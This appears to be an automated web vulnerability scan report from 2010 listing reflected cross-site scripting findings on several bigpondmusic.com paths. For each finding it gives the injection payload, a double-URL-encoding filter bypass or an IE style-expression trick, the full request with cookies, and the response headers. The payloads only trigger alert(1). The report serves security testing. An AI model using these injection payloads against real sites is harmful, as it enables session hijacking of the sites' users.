<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c52d'%3b29b0dcfee78 was submitted in the REST URL parameter 1. This input was echoed as 4c52d';29b0dcfee78 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:07:22 GMT Content-Type: text/html; charset=utf-8 Content-Length: 87849
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae797%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede5ed70a362 was submitted in the REST URL parameter 1. This input was echoed as ae797"><script>alert(1)</script>de5ed70a362 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /live-gigsae797%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede5ed70a362/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88264
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4136'%3b9736a476d52 was submitted in the REST URL parameter 1. This input was echoed as f4136';9736a476d52 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-gigsf4136'%3b9736a476d52/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88041
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.295. http://bigpondmusic.com/live-gigs/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/live-gigs/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 151cb"style%3d"x%3aexpression(alert(1))"74351575516 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 151cb"style="x:expression(alert(1))"74351575516 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /live-gigs/?151cb"style%3d"x%3aexpression(alert(1))"74351575516=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:15:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 111452
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb475"style%3d"x%3aexpression(alert(1))"6e6ed52df2d was submitted in the ref parameter. This input was echoed as eb475"style="x:expression(alert(1))"6e6ed52df2d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /live-gigs/?ref=Net-Head-Music-LiveGigseb475"style%3d"x%3aexpression(alert(1))"6e6ed52df2d HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:16:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 111954
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bd2d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d29116d9f7 was submitted in the REST URL parameter 1. This input was echoed as 5bd2d"><script>alert(1)</script>3d29116d9f7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /mixtapes5bd2d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d29116d9f7/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:14:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87933
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21d55'%3b454f86f624d was submitted in the REST URL parameter 1. This input was echoed as 21d55';454f86f624d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mixtapes21d55'%3b454f86f624d/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:14:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87932
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.299. http://bigpondmusic.com/mixtapes/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/mixtapes/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8de29"style%3d"x%3aexpression(alert(1))"31aae0257c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8de29"style="x:expression(alert(1))"31aae0257c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /mixtapes/?8de29"style%3d"x%3aexpression(alert(1))"31aae0257c7=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:14:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 102578
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6035a"style%3d"x%3aexpression(alert(1))"9e82f9f035d was submitted in the ref parameter. This input was echoed as 6035a"style="x:expression(alert(1))"9e82f9f035d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /mixtapes/?ref=Net-Head-Music-Mixtapes6035a"style%3d"x%3aexpression(alert(1))"9e82f9f035d HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:14:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 102964
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33e86'%3bd1df954475b was submitted in the REST URL parameter 1. This input was echoed as 33e86';d1df954475b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mixtapes33e86'%3bd1df954475b/all HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87859
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b901%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee7182dfd609 was submitted in the REST URL parameter 1. This input was echoed as 2b901"><script>alert(1)</script>e7182dfd609 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /mixtapes2b901%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee7182dfd609/all HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87901
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6dbd4'%3b059aceb2c2e was submitted in the REST URL parameter 2. This input was echoed as 6dbd4';059aceb2c2e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mixtapes/all6dbd4'%3b059aceb2c2e HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:16:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87806
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab33f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ebe2764287 was submitted in the REST URL parameter 2. This input was echoed as ab33f"><script>alert(1)</script>2ebe2764287 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /mixtapes/allab33f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ebe2764287 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:16:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88125
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.305. http://bigpondmusic.com/mixtapes/all [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/mixtapes/all
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebf71"style%3d"x%3aexpression(alert(1))"6edf1b6c523 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ebf71"style="x:expression(alert(1))"6edf1b6c523 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /mixtapes/all?ebf71"style%3d"x%3aexpression(alert(1))"6edf1b6c523=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:15:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 98341
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 823e0'%3b02f9b6b6a1a was submitted in the REST URL parameter 1. This input was echoed as 823e0';02f9b6b6a1a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mixtapes823e0'%3b02f9b6b6a1a/celebrity HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:14:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87808
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
